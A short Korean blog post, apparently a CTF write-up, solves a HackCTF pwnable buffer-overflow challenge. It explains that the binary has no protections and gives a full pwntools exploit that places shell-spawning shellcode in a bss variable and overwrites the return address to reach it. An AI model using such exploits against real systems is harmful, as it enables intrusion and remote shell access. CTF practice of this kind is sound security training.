본문 바로가기

HackCTF/pwnable

HackCTF - 내 버퍼가 흘러넘친다!!!

 

아무런 보호기법이 안걸려 있다

 

 

main에 name 이 없는데 사용하는 걸 보니

 

bss 주소에 있나 보다

 

name에 쉘코드를 저장하고 gets에서  name으로 이동하면 된다

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3003)
e = ELF('./prob1')
context.arch = 'i386'

name = 0x804A060
shellcode  = asm(shellcraft.i386.sh()) 

r.sendline(shellcode)

payload = 'A'*24
payload += p32(name)

r.sendline(payload)

r.interactive()

'HackCTF > pwnable' 카테고리의 다른 글

HackCTF - x64 Simple_size_BOF  (0) 2021.11.21
HackCTF - x64 Buffer Overflow  (0) 2021.11.21
HackCTF - Basic_FSB  (0) 2021.11.20
HackCTF - Basic_BOF #2  (0) 2021.11.20
Hackctf - Basic_BOF #1  (0) 2021.11.20